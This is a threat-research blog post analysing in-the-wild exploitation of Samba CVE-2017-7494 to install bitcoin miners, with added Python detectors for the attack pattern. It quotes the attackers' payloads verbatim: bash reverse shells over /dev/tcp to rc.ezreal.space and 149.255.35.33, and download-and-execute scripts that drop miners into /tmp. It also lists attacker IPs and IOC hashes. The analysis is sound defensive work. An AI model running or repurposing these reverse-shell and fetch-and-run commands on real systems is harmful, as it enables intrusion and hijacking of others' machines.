Samba CVE-2017-7494 Getting Exploited in the Wild, Distributing Bitcoin Miners

June 12, 2017 by Alex Burt

In our continuous monitoring of threats in the wild, Cyphort Labs has detected multiple exploitation attempts using the recently disclosed Samba vulnerability CVE-2017-7494. The threat actors probably belong to a cyber crime ring, because from what we can gather, the sole intent of the exploitation is to run bitcoin miners. It is interesting to note that this exploit incorporates advanced functionality that was released in the Metasploit framework only a week ago, which reinforces the notion that cyber criminals keep a close watch on recent developments and are quick to integrate newly disclosed information into their arsenal of weapons.

Below, we provide details of a couple of such attacks.

Exploitation

The Samba share we investigated allowed write access to guest accounts. This is a prerequisite because the vulnerability requires that the attacker has access to valid credentials or that the share is writable by guests.

The first attack was perpetrated from the IP 45.76.158.18, which seems to belong to a cloud hosting provider. No surprises there.

Step 1: Identify network shares. Upon connection to our Samba port, the attacker listed available shares using the NetShareEnumAll method.

Step 2: Identify the local path. This is required for the exploit to work. In our observation, the attackers identified the local path for the share using the NetShareGetInfo method. This is fairly new: in the preceding days, attackers would instead brute force the path by trying several candidates such as /var/, /home/, etc.

Step 3: Upload the malware to the share. In our case, the file name was a random string with a .so file extension (GJZjrflB.so).

Step 4: Trigger the exploit to execute remote code. Following the published exploit information, the attacker made an “NT Create AndX” request using the local path to the uploaded malicious library, in the form of a “\\PIPE\/tmp/smb/FWUNy14ZME/GJZjrflB.so” request, which triggers the code execution.

Figure 1. pcap of one attack using CVE-2017-7494
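The sequence above has a simple network-level tell: a legitimate named pipe is a bare name such as srvsvc, whereas the CVE-2017-7494 trigger opens a “pipe” whose name is an absolute filesystem path. The following detector is an added example, not code from the original post; it assumes a constructed, hypothetical sensor format of one line per SMB request (client, command, argument) and flags path-shaped pipe opens, noting whether the same client uploaded that file beforehand.

```python
"""Flag the CVE-2017-7494 trigger in a stream of SMB request records.

Added example (not from the original post). It assumes a hypothetical sensor
that emits one line per SMB request as: <client> <command> <argument>.
The trigger described in the post is an NT Create AndX open of a "named pipe"
whose name is really an absolute filesystem path (\\PIPE\\/tmp/.../x.so),
preceded by a write of that same file to a writable share.
"""
import re
from typing import Dict, List, Set

# Constructed sample events mirroring the sequence observed in the post,
# plus two benign requests from another client.
SAMPLE_EVENTS = """\
45.76.158.18 NetShareEnumAll -
45.76.158.18 NetShareGetInfo share=public path=/tmp/smb/FWUNy14ZME
45.76.158.18 Write share=public file=GJZjrflB.so
45.76.158.18 NTCreateAndX \\PIPE\\/tmp/smb/FWUNy14ZME/GJZjrflB.so
10.0.0.7 NTCreateAndX \\PIPE\\srvsvc
10.0.0.7 Write share=public file=report.pdf
"""

# A real pipe name contains no slash; a slash means a filesystem path is
# being handed to Samba as a module to load.
PIPE_PATH_RE = re.compile(r"^\\PIPE\\(?P<path>.*/(?P<base>[^/]+))$")


def detect_pipe_path_loads(events: str) -> List[Dict[str, object]]:
    """Return one alert per NT Create AndX whose pipe name is a path."""
    written: Dict[str, Set[str]] = {}  # client -> basenames it uploaded
    alerts: List[Dict[str, object]] = []
    for line in events.splitlines():
        client, command, arg = line.split(" ", 2)
        if command == "Write":
            written.setdefault(client, set()).add(arg.split("file=", 1)[1])
        elif command == "NTCreateAndX":
            m = PIPE_PATH_RE.match(arg)
            if m:
                alerts.append({
                    "client": client,
                    "path": m.group("path"),
                    # Stronger signal: the same client uploaded the file first
                    "uploaded_by_client": m.group("base") in written.get(client, set()),
                })
    return alerts
```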

Payload Malware

We noticed the malicious library would execute this shell command:

bash -i < /dev/tcp/rc.ezreal.space/4000 || ((wget http://rc.ezreal.space/minerd64_s -O /tmp/m || curl http://rc.ezreal.space/minerd64_s -o /tmp/m) && chmod +x /tmp/m && (nohup /tmp/m &))

which runs an interactive shell fed by commands retrieved from rc.ezreal.space (149.255.35.33):4000 or, if that connection fails, downloads a binary to /tmp/m using either wget or curl, then runs it. The binary is a bitcoin miner.

After that, the attackers run the following script:

#!/usr/bin/env bash
host='149.255.35.33';
nohup bash -i < /dev/tcp/${host}/4001 &
nohuo bash -i < /dev/tcp/${host}/4002 &
nohuo bash -i < /dev/tcp/${host}/4003 &

Notice the “nohuo” typo in the original script. We initially thought it may be an attempt at identifying potential researchers who would correct the typo and connect to those ports, but it turns out it might have been an inadvertent mistake. Attackers probably meant “nohup” – in a Linux shell, prefixing a command with nohup prevents the command from being aborted if you log out or exit the shell. The name nohup stands for “no hangup.”

From the first port 4001, the following script is downloaded and executed:

#!/usr/bin/env bash
#minerd script
host='149.255.35.33';
target=$RANDOM; target+=.so; target=/tmp/$target;
cat < /dev/tcp/${host}/5000 > $target && chmod +x $target && nohup $target &

which again downloads yet another bitcoin miner and launches it.

From 149.255.35.33:4002, we get the following script:

#!/usr/bin/env bash
# process guard script

This is probably a placeholder for future enhancement of restarting the bitcoin miner in case it gets killed.

From 149.255.35.33:4003, we obtained the following script:

#!/usr/bin/env bash
# auto start script

which may be a placeholder for a future enhancement that provides persistence upon reboots.

In a different attack, we observed slightly different commands sent by the C2 servers, but along the same broad lines:

Attacker IP: 45.32.101.90.

The shared library also downloaded a bitcoin miner (see hash at the bottom of this blog) and then proceeded to connect to 45.76.146.166 to obtain and execute the following script:

from 45.76.146.166:4444

#!/usr/bin/env bash
#minerd script
pkill .so;
host='45.76.146.166';
target=$RANDOM; target+=.so; target=/tmp/$target;
cat < /dev/tcp/${host}/5555 > $target && chmod +x $target && nohup  $target &
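Every stage of the payload above relies on bash's /dev/tcp pseudo-device, either to pull an interactive shell from the C2 or to stream a binary into /tmp, mark it executable and launch it under nohup. The following triage helper is an added example, not code from the post; it assumes command lines as a host sensor such as auditd would record them, and the samples are constructed (the first two reproduce the post's commands).

```python
"""Pull C2 endpoints and dropped-and-executed files out of shell command lines.

Added example, not code from the original post. Input is constructed: command
strings as a host-based sensor (e.g. auditd execve records) would record them.
"""
import re
from typing import Dict, List

DEV_TCP_RE = re.compile(r"/dev/tcp/(?P<host>[^/\s]+)/(?P<port>\d+)")
URL_RE = re.compile(r"https?://[^\s'\"]+")
DROP_RE = re.compile(r"chmod\s+\+x\s+(?P<path>\S+)")

# Constructed samples: the first two mirror the post's commands, the third is benign.
SAMPLE_COMMANDS: List[str] = [
    "bash -i < /dev/tcp/rc.ezreal.space/4000 || ((wget http://rc.ezreal.space/minerd64_s -O /tmp/m "
    "|| curl http://rc.ezreal.space/minerd64_s -o /tmp/m) && chmod +x /tmp/m && (nohup /tmp/m &))",
    "cat < /dev/tcp/45.76.146.166/5555 > /tmp/12345.so && chmod +x /tmp/12345.so && nohup  /tmp/12345.so &",
    "tar czf /tmp/backup.tgz /etc && chmod 600 /tmp/backup.tgz",
]


def analyse_command(cmd: str) -> Dict[str, object]:
    """Summarise the network endpoints, dropped files and launches in one command line."""
    endpoints = sorted({f"{m['host']}:{m['port']}" for m in DEV_TCP_RE.finditer(cmd)})
    urls = sorted(set(URL_RE.findall(cmd)))
    dropped = DROP_RE.findall(cmd)
    # A dropped file counts as executed when it is launched after the chmod,
    # directly ("&& /tmp/x") or wrapped in nohup ("nohup /tmp/x &").
    executed = [
        p for p in dropped
        if re.search(r"(?:nohup\s+|&&\s*\(?\s*)" + re.escape(p) + r"(?=[\s&)]|$)", cmd)
    ]
    return {
        "endpoints": endpoints,
        "urls": urls,
        "dropped": dropped,
        "executed": executed,
        # Remote fetch plus execution of the fetched file is the miner pattern.
        "suspicious": bool(executed) and bool(endpoints or urls),
    }
```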

Conclusion

It is clear that the recently disclosed Samba vulnerability is being actively exploited in the wild by criminal groups trying to monetize their investment. We will probably see this technique spread to include spambots, start lateral spread from the compromised systems and definitely evolve into full-fledged espionage, industrial or otherwise. With the price of Bitcoin hovering around $2800 and reaching new all-time records every week, it is no surprise that bitcoin miners are in fashion again.

IOCs

Traffic pcap: c208fdfe2ce715bbd8dbedf83bd940f0e6fa4064d1880bfdd5ad956aa2e2531c
Exploit library: 13a0ce618dcd0e17c7d8267174d07a997d39fcea10f8951ea7c0b5218ddcfe85
Bitcoin miner: 1af2b594fe2b050fab44bc4f1d951a228192b22a6e4ba98a553dba78231d15e9
Exploit library: 06778ca06eb0be4a734a2908f3746764c148817707dbc32fad5f8dac6cc81e46
Bitcoin miner: c8b3f03b0275b5bcee34a685187cd6b648346d9ca7f1b0cbb255c45856f7a49d